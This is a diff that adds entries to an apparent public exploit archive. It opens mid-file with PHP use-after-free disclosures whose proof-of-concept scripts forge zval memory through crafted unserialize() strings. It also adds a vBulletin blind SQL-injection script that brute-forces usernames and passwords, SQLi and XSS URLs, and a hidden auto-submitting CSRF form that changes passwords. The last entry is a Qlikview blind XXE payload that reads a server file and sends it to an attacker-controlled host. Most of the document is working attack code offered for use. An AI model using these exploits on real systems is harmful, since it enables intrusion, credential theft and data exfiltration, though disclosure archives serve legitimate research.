+    spl_ptr_llist_push(intern->llist, elem TSRMLS_CC);
+  }
+
+
+It has been demonstrated many times before that __wakeup() leads to
+ZVAL is freed from memory. However during deserialization will still
+allow to use R: or r: to set references to that already freed memory.
+It is possible to use-after-free attack and execute arbitrary code
+remotely.
+
+Proof of Concept Exploit
+------------
+The PoC works on standard MacOSX 10.11 installation of PHP 5.6.12.
+
+
+<?php
+
+class obj {
+  var $ryat;
+  function __wakeup() {
+    $this->ryat = 1;
+  }
+}
+
+$fakezval = ptr2str(1122334455);
+$fakezval .= ptr2str(0);
+$fakezval .= "\x00\x00\x00\x00";
+$fakezval .= "\x01";
+$fakezval .= "\x00";
+$fakezval .= "\x00\x00";
+
+$inner = 'i:1234;:i:1;';
+$exploit = 'a:5:{i:0;i:1;i:1;C:19:"SplDoublyLinkedList":'.strlen($inner).':{'.$inner.'}i:2;O:3:"obj":1:{s:4:"ryat";R:3;}i:3;a:1:{i:0;R:5;}i:4;s:'.strlen($fakezval).':"'.$fakezval.'";}';
+
+$data = unserialize($exploit);
+
+var_dump($data);
+
+function ptr2str($ptr)
+{
+  $out = '';
+  for ($i = 0; $i < 8; $i++) {
+    $out .= chr($ptr & 0xff);
+    $ptr >>= 8;
+  }
+  return $out;
+}
+
+?>
+
+
+Test the PoC on the command line:
+
+
+$ php uafpoc.php
+array(5) {
+  [0]=>
+  int(1)
+  [1]=>
+  &int(1)
+  [2]=>
+  object(obj)#2 (1) {
+    ["ryat"]=>
+    &int(1)
+  }
+  [3]=>
+  array(1) {
+    [0]=>
+    int(1122334455)  <===  so we can control the memory and create fake ZVAL :)
+  }
+  [4]=>
+  string(24) "?v?B????"
+}
diff --git a/platforms/php/dos/38121.txt b/platforms/php/dos/38121.txt
new file mode 100755
index 000000000..51c16d636
--- /dev/null
+++ b/platforms/php/dos/38121.txt
@@ -0,0 +1,104 @@
+Use After Free Vulnerability in unserialize() with GMP
+
+Taoguang Chen <[@chtg](http://github.com/chtg)> 
+Write Date: 2015.8.17 
+Release Date: 2015.9.4
+
+A use-after-free vulnerability was discovered in unserialize() with GMP object's deserialization that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
+
+Affected Versions
+------------
+Affected is PHP 5.6 < 5.6.13
+
+Credits
+------------
+This vulnerability was disclosed by Taoguang Chen.
+
+Description
+------------
+
+static int gmp_unserialize(zval **object, zend_class_entry *ce, const
+unsigned char *buf, zend_uint buf_len, zend_unserialize_data *data
+TSRMLS_DC) /* {{{ */
+{
+  ...
+
+  INIT_ZVAL(zv);
+  if (!php_var_unserialize(&zv_ptr, &p, max, &unserialize_data TSRMLS_CC)
+    || Z_TYPE_P(zv_ptr) != IS_STRING
+    || convert_to_gmp(gmpnum, zv_ptr, 10 TSRMLS_CC) == FAILURE
+  ) {
+    zend_throw_exception(NULL, "Could not unserialize number", 0 TSRMLS_CC);
+    goto exit;
+  }
+  zval_dtor(&zv);
+
+  INIT_ZVAL(zv);
+  if (!php_var_unserialize(&zv_ptr, &p, max, &unserialize_data TSRMLS_CC)
+    || Z_TYPE_P(zv_ptr) != IS_ARRAY
+  ) {
+    zend_throw_exception(NULL, "Could not unserialize properties", 0 TSRMLS_CC);
+    goto exit;
+  }
+
+
+The GMP object's deserialization can create ZVAL and free its
+zval_value from memory via zval_dtor(). However during deserialization
+will still allow to use R: or r: to set references to that already
+freed memory. It is possible to use-after-free attack and execute
+arbitrary code remotely.
+
+Proof of Concept Exploit
+------------
+The PoC works on standard MacOSX 10.11 installation of PHP 5.6.12.
+
+<?php
+
+$inner = 'r:2;a:1:{i:0;a:1:{i:0;r:4;}}';
+$exploit = 'a:2:{i:0;s:1:"1";i:1;C:3:"GMP":'.strlen($inner).':{'.$inner.'}}';
+
+$data = unserialize($exploit);
+
+$fakezval = ptr2str(1122334455);
+$fakezval .= ptr2str(0);
+$fakezval .= "\x00\x00\x00\x00";
+$fakezval .= "\x01";
+$fakezval .= "\x00";
+$fakezval .= "\x00\x00";
+
+for ($i = 0; $i < 5; $i++) {
+    $v[$i] = $fakezval.$i;
+}
+
+var_dump($data);
+
+function ptr2str($ptr)
+{
+  $out = '';
+  for ($i = 0; $i < 8; $i++) {
+    $out .= chr($ptr & 0xff);
+    $ptr >>= 8;
+  }
+  return $out;
+}
+
+?>
+
+
+Test the PoC on the command line:
+
+$ php uafpoc.php
+array(2) {
+  [0]=>
+  int(1122334455)  <===  so we can control the memory and create fake ZVAL :)
+  [1]=>
+  object(GMP)#1 (2) {
+    [0]=>
+    array(1) {
+      [0]=>
+      int(4325299791)
+    }
+    ["num"]=>
+    string(1) "1"
+  }
+}
diff --git a/platforms/php/dos/38122.txt b/platforms/php/dos/38122.txt
new file mode 100755
index 000000000..d8a487abc
--- /dev/null
+++ b/platforms/php/dos/38122.txt
@@ -0,0 +1,106 @@
+Yet Another Use After Free Vulnerability in unserialize() with SplObjectStorage
+
+Taoguang Chen <[@chtg](http://github.com/chtg)> 
+Write Date: 2015.8.27 
+Release Date: 2015.9.4
+
+A use-after-free vulnerability was discovered in unserialize() with SplObjectStorage object's deserialization and crafted object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
+
+Affected Versions
+------------
+Affected is PHP 5.6 < 5.6.13
+Affected is PHP 5.5 < 5.5.29
+Affected is PHP 5.4 < 5.4.45
+
+Credits
+------------
+This vulnerability was disclosed by Taoguang Chen.
+
+Description
+------------
+
+
+    ALLOC_INIT_ZVAL(pentry);
+    if (!php_var_unserialize(&pentry, &p, s + buf_len, &var_hash TSRMLS_CC)) {
+      zval_ptr_dtor(&pentry);
+      goto outexcept;
+    }
+    if(Z_TYPE_P(pentry) != IS_OBJECT) {
+      goto outexcept;
+    }
+    ALLOC_INIT_ZVAL(pinf);
+    if (*p == ',') { /* new version has inf */
+      ++p;
+      if (!php_var_unserialize(&pinf, &p, s + buf_len, &var_hash TSRMLS_CC)) {
+        zval_ptr_dtor(&pinf);
+        goto outexcept;
+      }
+    }
+
+
+It has been demonstrated many times before that __wakeup() leads to
+ZVAL is freed from memory. However during deserialization will still
+allow to use R: or r: to set references to that already freed memory.
+It is possible to use-after-free attack and execute arbitrary code
+remotely.
+
+Proof of Concept Exploit
+------------
+The PoC works on standard MacOSX 10.11 installation of PHP 5.6.12.
+
+
+<?php
+
+class obj {
+  var $ryat;
+  function __wakeup() {
+    $this->ryat = 1;
+  }
+}
+
+$fakezval = ptr2str(1122334455);
+$fakezval .= ptr2str(0);
+$fakezval .= "\x00\x00\x00\x00";
+$fakezval .= "\x01";
+$fakezval .= "\x00";
+$fakezval .= "\x00\x00";
+
+$inner = 'x:i:1;O:8:"stdClass":0:{},i:1;;m:a:0:{}';
+$exploit = 'a:5:{i:0;i:1;i:1;C:16:"SplObjectStorage":'.strlen($inner).':{'.$inner.'}i:2;O:3:"obj":1:{s:4:"ryat";R:3;}i:3;R:6;i:4;s:'.strlen($fakezval).':"'.$fakezval.'";}';
+
+$data = unserialize($exploit);
+
+var_dump($data);
+
+function ptr2str($ptr)
+{
+  $out = '';
+  for ($i = 0; $i < 8; $i++) {
+    $out .= chr($ptr & 0xff);
+    $ptr >>= 8;
+  }
+  return $out;
+}
+
+?>
+
+
+Test the PoC on the command line:
+
+
+$ php uafpoc.php
+array(5) {
+  [0]=>
+  int(1)
+  [1]=>
+  &int(1)
+  [2]=>
+  object(obj)#3 (1) {
+    ["ryat"]=>
+    &int(1)
+  }
+  [3]=>
+  int(1122334455)  <===  so we can control the memory and create fake ZVAL :)
+  [4]=>
+  string(24) "?v?B????"
+}
diff --git a/platforms/php/dos/38123.txt b/platforms/php/dos/38123.txt
new file mode 100755
index 000000000..e2ae315af
--- /dev/null
+++ b/platforms/php/dos/38123.txt
@@ -0,0 +1,125 @@
+Use After Free Vulnerabilities in Session Deserializer
+
+Taoguang Chen <[@chtg](http://github.com/chtg)> 
+Write Date: 2015.8.9
+Release Date: 2015.9.4
+
+Multiple use-after-free vulnerabilities were discovered in session deserializer (php/php_binary/php_serialize) that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
+
+Affected Versions
+------------
+Affected is PHP 5.6 < 5.6.13
+Affected is PHP 5.5 < 5.5.29
+Affected is PHP 5.4 < 5.4.45
+
+Credits
+------------
+This vulnerability was disclosed by Taoguang Chen.
+
+Description
+------------
+
+PS_SERIALIZER_DECODE_FUNC(php) /* {{{ */
+{
+
+  ...  
+
+  PHP_VAR_UNSERIALIZE_INIT(var_hash);
+
+  p = val;
+
+  while (p < endptr) {
+    
+    ...
+
+    if (has_value) {
+      ALLOC_INIT_ZVAL(current);
+      if (php_var_unserialize(&current, (const unsigned char **) &q,
+(const unsigned char *) endptr, &var_hash TSRMLS_CC)) {
+        php_set_session_var(name, namelen, current, &var_hash  TSRMLS_CC);
+      }
+      zval_ptr_dtor(&current);
+    }
+    PS_ADD_VARL(name, namelen);
+skip:
+    efree(name);
+
+    p = q;
+  }
+break_outer_loop:
+
+  PHP_VAR_UNSERIALIZE_DESTROY(var_hash);
+
+  return SUCCESS;
+}
+
+
+When session deserializer (php/php_binary) deserializing multiple data
+it will call to php_var_unserialize() multiple times. So we can create
+ZVAL and free it via the php_var_unserialize() with a crafted
+serialized string, and also free the memory (reduce the reference
+count of the ZVAL to zero) via zval_ptr_dtor() with deserialize two
+identical session data, then the next call to php_var_unserialize()
+will still allow to use R: or r: to set references to that already
+freed memory. It is possible to use-after-free attack and execute
+arbitrary code remotely.
+
+In some other cases, session deserializer
+(php/php_binary/php_serialize) may also lead to use-after-free
+vulnerabilities: i) via crafted Serializable::unserialize() ii) via
+unserialize()'s callback function and zend_lookup_class() call a
+crafted __autoload().
+
+Proof of Concept Exploit
+------------
+The PoC works on standard MacOSX 10.11 installation of PHP 5.4.44.
+
+
+<?php
+
+session_start();
+
+$fakezval = ptr2str(1122334455);
+$fakezval .= ptr2str(0);
+$fakezval .= "\x00\x00\x00\x00";
+$fakezval .= "\x01";
+$fakezval .= "\x00";
+$fakezval .= "\x00\x00";
+
+$exploit = 'ryat|a:2:{i:0;i:1;i:1;a:1:{i:1;chtg|a:1:{i:0;R:4;}';
+// $exploit = 'ryat|a:1:{i:0;i:1;}ryat|i:1;chtg|R:1;';
+session_decode($exploit);
+
+for ($i = 0; $i < 5; $i++) {
+    $v[$i] = $fakezval.$i;
+}
+
+var_dump($_SESSION);
+
+function ptr2str($ptr)
+{
+  $out = "";
+  for ($i = 0; $i < 8; $i++) {
+    $out .= chr($ptr & 0xff);
+    $ptr >>= 8;
+  }
+  return $out;
+}
+
+?>
+
+
+Test the PoC on the command line:
+
+
+$ php uafpoc.php
+array(2) {
+  ["ryat"]=>
+  NULL
+  ["chtg"]=>
+  array(1) {
+    [0]=>
+    int(1122334455)  <===  so we can control the memory and create fake ZVAL :)
+  }
+}
+
diff --git a/platforms/php/dos/38125.txt b/platforms/php/dos/38125.txt
new file mode 100755
index 000000000..33a502523
--- /dev/null
+++ b/platforms/php/dos/38125.txt
@@ -0,0 +1,179 @@
+Use After Free Vulnerabilities in unserialize()
+
+Taoguang Chen <[@chtg](http://github.com/chtg)> 
+Write Date: 2015.7.31 
+Release Date: 2015.9.4
+
+Multiple use-after-free vulnerabilities were discovered in unserialize() with Serializable class that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
+
+Affected Versions
+------------
+Affected is PHP 5.6 < 5.6.12
+Affected is PHP 5.5 < 5.5.28
+Affected is PHP 5.4 < 5.4.44
+
+Credits
+------------
+This vulnerability was disclosed by Taoguang Chen.
+
+Description
+------------
+
+  if (ce->unserialize == NULL) {
+    zend_error(E_WARNING, "Class %s has no unserializer", ZSTR_VAL(ce->name));
+    object_init_ex(rval, ce);
+  } else if (ce->unserialize(rval, ce, (const unsigned char*)*p,
+datalen, (zend_unserialize_data *)var_hash) != SUCCESS) {
+    return 0;
+  }
+
+  (*p) += datalen;
+
+  return finish_nested_data(UNSERIALIZE_PASSTHRU);
+
+
+The unserialize() with Serializable class lead to various problems.
+
+i) Free the memory via crafted Serializable class
+
+
+<?php
+
+class obj implements Serializable {
+    var $data;
+    function serialize() {
+        return serialize($this->data);
+    }
+    function unserialize($data) {
+        $this->data = unserialize($data);
+        $this->data = 1;
+    }
+}
+
+?>
+
+
+ii) Free the memory via the process_nested_data() with a invalid
+serialized string
+
+
+static inline int process_nested_data(UNSERIALIZE_PARAMETER, HashTable
+*ht, long elements, int objprops)
+{
+  while (elements-- > 0) {
+    zval *key, *data, **old_data;
+
+    ...
+
+    ALLOC_INIT_ZVAL(data);
+
+    if (!php_var_unserialize(&data, p, max, var_hash TSRMLS_CC)) {
+      zval_dtor(key);
+      FREE_ZVAL(key);
+      zval_dtor(data);
+      FREE_ZVAL(data);  <===  free the memory
+      return 0;
+    }
+
+
+iii) Free the memory via the var_push_dtor_no_addref() with the var_destroy().
+
+
+PHPAPI void var_destroy(php_unserialize_data_t *var_hashx)
+{
+
+  ...
+  
+  while (var_hash) {
+    for (i = 0; i < var_hash->used_slots; i++) {
+      zval_ptr_dtor(&var_hash->data[i]);  <===  free the memory
+    }
+  
+  ...
+  
+PHPAPI int php_var_unserialize(UNSERIALIZE_PARAMETER)
+{
+
+  ...
+  
+  if (*rval != NULL) {
+    var_push_dtor_no_addref(var_hash, rval);
+  }
+  *rval = *rval_ref;
+
+
+We can create ZVAL and free it via Serializable::unserialize. However
+the unserialize() will still allow to use R: or r: to set references
+to that already freed memory. It is possible to use-after-free attack
+and execute arbitrary code remotely.
+
+Proof of Concept Exploit
+------------
+The PoC works on standard MacOSX 10.11 installation of PHP 5.4.43.
+
+
+<?php
+
+$fakezval = ptr2str(1122334455);
+$fakezval .= ptr2str(0);
+$fakezval .= "\x00\x00\x00\x00";
+$fakezval .= "\x01";
+$fakezval .= "\x00";
+$fakezval .= "\x00\x00";
+
+// i)
+//$inner = 'a:1:{i:0;i:1;}';
+//$exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;R:3;}';
+// ii)
+$inner = 'a:2:{i:0;i:1;i:1;i:2';
+$exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;R:5;}';
+// iii)
+//$inner = 'r:1;';
+//$exploit = 'a:1:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}}';
+
+$data = unserialize($exploit);
+
+for ($i = 0; $i < 5; $i++) {
+    $v[$i] = $fakezval.$i;
+}
+
+var_dump($data);
+
+function ptr2str($ptr)
+{
+  $out = "";
+  for ($i = 0; $i < 8; $i++) {
+    $out .= chr($ptr & 0xff);
+    $ptr >>= 8;
+  }
+  return $out;
+}
+
+class obj implements Serializable {
+  var $data;
+  function serialize() {
+    return serialize($this->data);
+  }
+  function unserialize($data) {
+        $this->data = unserialize($data);
+//    i)
+//    $this->data = '1';
+  }
+}
+
+?>
+
+
+Test the PoC on the command line:
+
+
+$ php uafpoc.php
+array(2) {
+  [0]=>
+  object(obj)#1 (1) {
+    ["data"]=>
+    bool(false)
+  }
+  [1]=>
+  int(1122334455)  <===  so we can control the memory and create fake ZVAL :)
+}
diff --git a/platforms/php/webapps/38111.txt b/platforms/php/webapps/38111.txt
new file mode 100755
index 000000000..c3745ec6b
--- /dev/null
+++ b/platforms/php/webapps/38111.txt
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/56860/info
+
+The Simple Gmail Login plugin for Wordpress is prone to an information-disclosure vulnerability.
+
+Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
+
+Simple Gmail Login 1.1.3 and prior are vulnerable.
+
+Fatal error: Uncaught exception 'Exception' with message
+'DateTimeZone::__construct() [<a
+href='datetimezone.--construct'>datetimezone.--construct</a>]: Unknown or bad timezone ()' in
+C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php:229
+Stack trace: #0
+C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php(229): 
+DateTimeZone->__construct('') #1
+C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php(210): 
+SimpleGmail_Plugin->log('Plugin activate...', false) #2 [internal
+function]: SimpleGmail_Plugin->activate('') #3
+C:\xampp\htdocs\wordpress\wp-includes\plugin.php(403): 
+call_user_func_array(Array, Array) #4
+C:\xampp\htdocs\wordpress\wp-admin\plugins.php(157): 
+do_action('activate_simple...') #5 {main} thrown in C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php
+on line 229
diff --git a/platforms/php/webapps/38112.txt b/platforms/php/webapps/38112.txt
new file mode 100755
index 000000000..0891ea715
--- /dev/null
+++ b/platforms/php/webapps/38112.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/56862/info
+
+FOOT Gestion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?page=contacter.php&id=-1 union select 1,2--%20 
\ No newline at end of file
diff --git a/platforms/php/webapps/38113.php b/platforms/php/webapps/38113.php
new file mode 100755
index 000000000..79950a200
--- /dev/null
+++ b/platforms/php/webapps/38113.php
@@ -0,0 +1,86 @@
+source: http://www.securityfocus.com/bid/56877/info
+
+The ajaxReg module for vBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+#!/usr/bin/php
+<?
+
+# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
+# https://www.example.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
+# livedemo : http://www.example.com/watch?v=LlKaYyJxH7E
+# check it : http://www.example.com/vBulletin/clientscript/register.js
+
+function usage ()
+{
+    echo
+        "\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".
+        "\n[+] Author: Cold z3ro".
+        "\n[+] Site  : http://www.example.com | www.example.com".
+        "\n[+] vandor: http://www.example.com/forum/showthread.php?t=144869".
+        "\n[+] Usage : php 0day.php <hostname> <path> [userid] [key]".
+        "\n[+] Ex.   : php 0day.php www.example.com /vBulletin/ 1 abcdefghijklmnopqrstuvwxyz".
+        "\n[+] Note. : Its a 0day exploit\n\n";
+    exit ();
+}
+ 
+function check ($hostname, $path, $field, $pos, $usid, $char)
+{
+    $char = ord ($char);
+    $inj = 'ajax.php?do=CheckUsername&param=';
+  $inj.= 
+"admin'+and+ascii(substring((SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1))={$char}/*";
+  $culr = $hostname.$path.$inj;
+  $curl = curl_init();
+  curl_setopt ($curl, CURLOPT_URL, $culr );
+  curl_setopt($curl, CURLOPT_HEADER, 1);
+  curl_setopt($curl, CURLOPT_VERBOSE, 0);
+    ob_start();
+    curl_exec ($curl);
+    curl_close ($curl);
+    $con = ob_get_contents();
+    ob_end_clean();
+  if(eregi('Invalid',$con))
+      return true;
+    else
+        return false;
+}
+ 
+ 
+function brutechar ($hostname, $path, $field, $usid, $key)
+{
+    $pos = 1;
+    $chr = 0;
+    while ($chr < strlen ($key))
+    {
+        if (check ($hostname, $path, $field, $pos, $usid, $key [$chr]))
+        {
+            echo $key [$chr];
+            $chr = -1;
+            $pos++;
+        }
+        $chr++;
+    }
+}
+ 
+ 
+if (count ($argv) != 4)
+    usage ();
+ 
+$hostname = $argv [1];
+$path = $argv [2];
+$usid = $argv [3];
+$key = $argv [4];
+if (empty ($key))
+    $key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
+ 
+echo "[+] Username: ";
+brutechar ($hostname, $path, "username", $usid, $key);
+echo "\n[+] Password: ";
+brutechar ($hostname, $path, "password", $usid, $key);
+echo "\n[+] Done..";
+echo "\n[+] It's not fake, its real.";
+# word to 1337day.com, stop scaming me
+
+?>
diff --git a/platforms/php/webapps/38115.txt b/platforms/php/webapps/38115.txt
new file mode 100755
index 000000000..827879130
--- /dev/null
+++ b/platforms/php/webapps/38115.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/56882/info
+
+Simple Invoices is prone to multiple HTML-injection vulnerabilities and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. 
+
+[http://]www.example.com/simpleinvoices/index.php?module=invoices&view=manage&having=%3C/script%3E%3Cscript%3Ealert%28%27POC%20XSS%27%29;%3C/script%3E%3Cscript%3E 
\ No newline at end of file
diff --git a/platforms/php/webapps/38119.html b/platforms/php/webapps/38119.html
new file mode 100755
index 000000000..73ca9ba0d
--- /dev/null
+++ b/platforms/php/webapps/38119.html
@@ -0,0 +1,60 @@
+<!--
+# Exploit Title: [Auto-exchanger version 5.1.0 Xsrf]
+# Date: [2015/06/05]
+# Exploit Author: [Aryan Bayaninejad]
+# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
+# Vendor Homepage: [www.auto-exchanger.com]
+# Version: [Version 5.1.0]
+# Demo : www.farhadexchange.com
+# CVE : [CVE-2015-6827]
+
+------------------------------------
+details:
+------------------------------------
+
+auto-exchanger version 5.1.0 suffers from an xsrf vulnerability , attacker
+is able to abuse of this vulnerability to change password by a hidden
+iframe in another page.
+
+-------------------------------------
+
+Exploit:
+
+-------------------------------------
+-->
+
+<html>
+<body>
+<iframe style="display:none" name="xsrf-frame"></iframe>
+<form method='POST' action='http://farhadexchange.com/signup.php'
+target="xsrf-frame" id="xsrf-form">
+
+<label id="lbl_error" name="lbl_error" class="ErrorMessage"></label>
+<INPUT type="hidden" name="suser" value="victim_user">
+<input type="hidden" name="section" value="do_update" />
+<label type='hidden' id="n_password0"><span>
+<input type='hidden' maxlength="20" size="30" name="password0"
+id="password0"   value="testpassword123456" >  </label>
+<input type="hidden" name="rid" value="" />
+<label id="n_password">
+<input type="hidden" maxlength="20" size="30" name="password1"
+id="password1"   value="testpassword123456"   ></label>
+<label id="n_mail">
+<INPUT type='hidden' maxLength=60 size=30 name="mail" id="mail"
+value="victim_email" type="text">
+</label>
+<label id="n_country">
+<input type='hidden'  name="country" id="country"  style="width:196;"
+value="IR">
+</label>
+<label id="cid">
+<input type='hidden' name='cid' value='2'/>
+</label>
+<label id="n_curreny_account">
+<INPUT type='hidden' maxLength=60 size=30 name="curreny_account"
+id="curreny_account" value="" ><br>
+</label>
+</form>
+<script>document.getElementById("xsrf-form").submit()</script>
+</body>
+</html>
\ No newline at end of file
diff --git a/platforms/xml/webapps/38118.txt b/platforms/xml/webapps/38118.txt
new file mode 100755
index 000000000..a5d474f88
--- /dev/null
+++ b/platforms/xml/webapps/38118.txt
@@ -0,0 +1,99 @@
+Exploit Title: Qlikview blind XXE security vulnerability
+Product: Qlikview
+Vulnerable Versions: v11.20 SR11 and previous versions
+Tested Version: v11.20 SR4
+Advisory Publication: 08/09/2015
+Latest Update: 08/09/2015
+Vulnerability Type: Improper Restriction of XML External Entity Reference [CWE-611]
+CVE Reference: CVE-2015-3623
+Credit: Alex Haynes
+
+Advisory Details:
+
+
+(1) Vendor & Product Description
+--------------------------------
+
+Vendor: QLIK
+
+Product & Version:
+QlikView v11.20 SR4
+
+Vendor URL & Download:
+http://www.qlik.com/us/explore/products/qlikview
+
+Product Description:
+"The QlikView Business Discovery platform delivers true self-service BI that empowers business users by driving innovative decision-making."
+
+
+(2) Vulnerability Details:
+--------------------------
+The Qlikview platform is vulnerable to XML External Entity (XXE) vulnerabilities. More specifically, the platform
+is susceptible to DTD parameter injections, which are also "blind" as the server feeds back no visual response. These vulnerabilities can be exploited
+to force Server Side Request Forgeries (SSRF)in multiple protocols, as well as reading and extracting arbitrary files on the server directly.
+
+Proof of concept for XXE [CVE-2015-5361]:
+-----------------------------------------
+URL: https://<QLIKVIEW>/AccessPoint.aspx
+
+Attack Pattern for SSRF: 
+------------------------
+In POST body:
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE update [
+<!ENTITY % external SYSTEM "http://yourserver.com">
+%external;]>
+
+OR simply 
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE roottag PUBLIC "-//WHITE//NINJA//EN" "http://yourserver.com">
+
+As this is a blind XXE, you will see no response from server, but yourserver.com will receive the HTTP request from the Qlikview server. Also works with FTP and HTTPS protocols.
+
+Attack Pattern for reading and extracting arbitrary files: 
+------------------------------------------
+In POST body:
+
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE roottag [
+<!ENTITY % remote SYSTEM "file:///c:/windows/win.ini">
+<!ENTITY % dtd SYSTEM "http://yourserver.com/test.dtd">
+%dtd;
+%send;
+]]>
+
+The test.dtd file on yourserver.com will need to contain the following:
+
+Test.dtd
+--------
+<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://yourserver.com/?%remote;'>">
+%all;
+
+As the response is blind, you will see no response from the server, but yourserver.com will receive the file contents as part of the URL in lieu of the %remote parameter.
+
+
+(3) Advisory Timeline:
+----------------------
+29/04/2015 - First Contact informing vendor of vulnerability
+30/04/2015 - Response requesting details of vulnerability. Details sent
+05/05/2015 - Vendor indicates issue is under investigation.
+06/05/2015 - Vendor confirms vulnerability and has started working on resolving the issue.
+20/05/2015 - Vendor confirms root cause has been identified and patch is under internal testing.
+08/06/2015 - Vendor confirms patch ready and requests 90 day restraint on vulnerability release to give clients time to patch.
+10/06/2015 - Patch 11.20 SR12 released, fixing the vulnerability
+08/09/2015 - Public disclosure of vulnerability.
+
+
+(4)Solution:
+------------
+Upgrade to QV11.20 SR12 will correct the vulnerability.
+
+
+(5) Credits:
+------------
+Discovered by Alex Haynes
+
+References:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3623
+http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3623
\ No newline at end of file